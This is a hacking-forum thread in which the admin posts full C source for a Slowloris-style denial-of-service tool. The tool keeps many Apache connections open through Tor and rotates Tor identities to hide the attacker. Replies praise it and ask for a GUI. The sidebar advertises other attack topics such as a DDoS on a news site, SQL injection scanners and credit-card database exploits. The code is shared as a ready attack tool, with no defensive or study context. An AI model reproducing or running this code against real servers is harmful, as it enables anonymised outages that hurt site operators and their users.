Malaysian WackWall Forum

Now Malaysian Can Connect Over The World
 
HomePortalCalendarGalleryFAQSearchMemberlistUsergroupsRegisterLog in
Navigation
:: Portal ::
:: Forum ::
 :: Memberlist ::
:: Profile ::
:: FAQ ::
:: Search ::


AlertPay Easy Money Transfer 100% Free to register
 
Log in
Username:
Password:
Log in automatically: 
:: I forgot my password
Google Translator
Latest topics
» IRC Flooder Script For Sale
Mon Oct 08, 2012 12:39 am by maxi.y.mateo

» utusan.com.my Being DDOS
Fri Jan 20, 2012 5:33 pm by Penjejak Badai

» PHP IRC Bot
Fri Dec 02, 2011 11:31 am by siperda

» SQL Injection Scanner By XShimeX
Mon Oct 24, 2011 6:22 pm by sucide_bomber

» Website Vulnerable Scanner Tools V1.01 By proqrammer
Mon Oct 24, 2011 6:21 pm by sucide_bomber

» Slowloris or XerXes Leak Version
Tue Sep 13, 2011 7:45 pm by sucide_bomber

» maisarah wuz here
Tue Sep 13, 2011 7:32 pm by sucide_bomber

» Sql Injection Tutorial
Tue Jul 19, 2011 2:56 pm by sucide_bomber

» XerXes Source Codes!!
Wed Jul 13, 2011 8:55 am by wackwall

» SQL Injection dalam bahasa Malaysia
Thu Jun 30, 2011 9:11 pm by sucide_bomber

» LFI Scanner ( Perl )
Mon Jun 27, 2011 8:21 am by wackwall

» Muhasabah diri tingkat kesyukuran, keinsafan umat
Mon Jun 27, 2011 3:56 am by sucide_bomber

» 5013 Webs With SQL Vuln
Mon Jun 27, 2011 3:50 am by sucide_bomber

» Saya mencari part time job online?
Mon Jun 27, 2011 1:19 am by sucide_bomber

» 16 exploits for hacking CC databases
Mon Jun 13, 2011 1:33 pm by sucide_bomber

Link Exchange
Online News


















Churp2x Campaign
Click Pada Iklan DiBawah & Dapatkan Ganjaran Anda
SEKARANG!



















Mangga Ads
NuffNang Ads

Share | 
 

 Slowloris or XerXes Leak Version

View previous topic View next topic Go down 
AuthorMessage
wackwall
Admin


Zodiac : Cancer Chinese zodiac : Rooster
Posts : 159
Points : 2626
Reputation : 2
Join date : 10/12/2010
Age : 35
Location Location : Sarawak

PostSubject: Slowloris or XerXes Leak Version   Wed Jul 13, 2011 9:02 am

Share It!!


Code:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

/* =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 *                  Slowloris with a twist over tor
 * =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 *
 * Due to the alpha version of this code being leaked I've decided
 * to release an improved version to fully show this method of
 * attack mostly free of the bugs / dependency on torsocks. This
 * attack works on a similar idea of slowloris only it sends packets
 * containing a single 0x00 and optionally nothing causing Apache
 * to keep the connection alive almost indefinitely.
 *
 * Due to no one knowing how th3j35t3r's XerXes works I can not say
 * if this is the same method. This was one of my many ideas I was
 * exploring as to how it could possibly work that has some successful
 * results.
 *
 * - SanguineRose / William Welna
 *
 *                        Leaked Version
 *        http://seclists.org/fulldisclosure/2011/Jul/84
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <netdb.h>
#include <signal.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <pthread.h>

/* Re-connecting to tor sometimes takes a while, in order for this to be effective it requires
 * mass amounts of threads handling only a few connections each, since this is a POC I will leave
 * it up to others to fix that. It also has limited success/attack lengths due to tor being slow
 */
#define CONNECTIONS 3
#define THREADS 148

typedef struct {
    const char *host, *port;
} thread_args;

// Simple debug function
void dump_array(char *name, char *data, int size) {
    int x, z, indent = strlen(name) + 2;
    fprintf(stderr, "%s { ", name);
    for(x=0; x < size; x++) {
        for(z=0; z < indent; z++)
            putc(0x20, stderr);
        fprintf(stderr, "%20x\n", data[x]);
    }
    fprintf(stderr, "};\n");
}

int make_socket(const char *host, const char *port) {
    struct addrinfo hints, *servinfo, *p;
    int sock, r, y=1;
    memset(&hints, 0, sizeof(hints));
    hints.ai_family = AF_UNSPEC;
    hints.ai_socktype = SOCK_STREAM;
    if((r=getaddrinfo(host, port, &hints, &servinfo))!=0) {
        fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(r));
        return -1;
    }
    for(p = servinfo; p != NULL; p = p->ai_next) {
        if((sock = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) {
            continue;
        }
        setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, &y, 4);
        if(connect(sock, p->ai_addr, p->ai_addrlen)==-1) {
            close(sock);
            continue;
        }
        break;
    }
    if(p == NULL) {
        if(servinfo)
            freeaddrinfo(servinfo);
        return -2;
    }
    if(servinfo)
        freeaddrinfo(servinfo);
    return sock;
}

/* Opens SOCKS5 connection to tor
 * I also dedicate this function to pr0f <3
 */
int pr0f_loves_me_tor_connect(const char *host, const char *port) {
    char *buf = calloc(1024, sizeof(char));
    short l = strlen(host), t;
    int x, sock;
    fprintf(stderr, "[Connect %s:%s]\n", host, port);
    if((sock=make_socket("127.0.0.1", "9050"))<0) {
        free(buf);
        return sock;
    }
    write(sock, "\x05\x01\x00", 3); // SOCKS5, 1 Authentication Method, No Auth/Plain
    read(sock, buf, 1024);
    if((buf[0] != 0x05) || (buf[1] == 0xFF) || (buf[1] != 0x00)) {
        free(buf);
        return -3; // Auth not accepted by socks server / wrong version
    }
    buf[0] = 0x05; buf[1] = 0x01; buf[2] = 0x00; buf[3] = 0x03; buf[4] = l;
    for(x=0; x < l; x++)
        buf[5+x] = host[x];
    x=l+5;
    t = htons(atoi(port));
    memcpy((buf+x), &t, 2);
    //dump_array("final_request", buf, x+2);
    write(sock, buf, x+2);// send request
    read(sock, buf, 1024);
    if((buf[0] == 0x05) && (buf[1] == 0x00)) { // connection granted/success
        free(buf);
        return sock;
    }
    free(buf);
    return -4; // Unable to conect
}

// This is for the SIGPIPE error on bad connections / premature closing
void broke(int s) {
    // do nothing
}

void *attack(void *arg) {
    thread_args *a = (thread_args *)arg;
    int x, r, socks[CONNECTIONS];
    fprintf(stderr, "[Thread Started]\n");
    for(x=0; x < CONNECTIONS; x++)
        socks[x]=0;
    signal(SIGPIPE, &broke);
    while(1) {
        for(x=0; x < CONNECTIONS; x++) {
            if(socks[x] <= 0) {
                socks[x] = pr0f_loves_me_tor_connect(a->host, a->port);
                fprintf(stderr, "[Socket Returned %i]\n", socks[x]);
            }
            if(write(socks[x], "\0", 1) < 0) {
                close(socks[x]);
                fprintf(stderr, "[Socket Error Returned %i]\n", socks[x]);
                socks[x] = pr0f_loves_me_tor_connect(a->host, a->port);
            }
        }
        usleep(100000);
    }
}

void do_help(char *n) {
    fprintf(stderr, "Usage: %s <ip/hostname> <port>\n");
    exit(0);
}

void *cycle_identity() {
    int sock = make_socket("localhost", "9051");
    char *shit_bucket = calloc(1024, sizeof(char));
    if(sock < 0) {
        fprintf(stderr, "Can't connect to tor control port\n");
        free(shit_bucket);
        pthread_exit(NULL);
    }
    write(sock, "AUTHENTICATE ""\n", 16);
    while(1) {
        write(sock, "signal NEWNYM\n", 15);
        fprintf(stderr, "[cycle_identity -> signal NEWNYM\n");
        read(sock, shit_bucket, 1024);
        sleep(5);
    }
}

int main(int argc, char **argv) {
    pthread_t threads[THREADS];
    pthread_t cycle_tid;
    thread_args arg;
    void *status;
    int x;
    if(argc != 3)
        do_help(argv[0]);
    arg.host = (const char *)argv[1];
    arg.port = (const char *)argv[2];
    pthread_create(&cycle_tid, NULL, cycle_identity, NULL);
    for(x=0; x < THREADS; x++) {
        pthread_create(&threads[x], NULL, attack, &arg);
        usleep(200000);
    }
    for(x=0; x < THREADS; x++)
        pthread_join(threads[x], &status);
    pthread_kill(cycle_tid, 15);
    pthread_exit(NULL);
    return 0;
}
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)

iF4EAREIAAYFAk4XxcIACgkQdBwqj+jihCUAeAD7BO07gG+GnEZWGcX9fn2takPy
zVSMo0KkwJBubUQtQwoA/1/ig9fN/adDhpOg1yPJmJrYCORcQhxbhxW1trWXQpEd
=yC0j
-----END PGP SIGNATURE-----

Finally Its Been Released!!
Back to top Go down
View user profile http://malaysia.1talk.net
sucide_bomber
New User
New User


Posts : 23
Points : 2058
Reputation : 0
Join date : 20/05/2011
Location Location : l4nd 0f h34d hunt3r

PostSubject: Re: Slowloris or XerXes Leak Version   Tue Jul 19, 2011 2:54 pm

cheers r0X...NICE SHARE MASTER....huhuhu tapi aku tak tau apa kegunaan benda ni.... afro
Back to top Go down
View user profile
sucide_bomber
New User
New User


Posts : 23
Points : 2058
Reputation : 0
Join date : 20/05/2011
Location Location : l4nd 0f h34d hunt3r

PostSubject: Re: Slowloris or XerXes Leak Version   Tue Sep 13, 2011 7:45 pm

bro...buat gui boleh ke...
Back to top Go down
View user profile
Sponsored content




PostSubject: Re: Slowloris or XerXes Leak Version   Today at 2:32 am

Back to top Go down
 
Slowloris or XerXes Leak Version
View previous topic View next topic Back to top 
Page 1 of 1

Permissions in this forum:You cannot reply to topics in this forum
Malaysian WackWall Forum :: Internet :: h4ck3d :: Tools-
Jump to: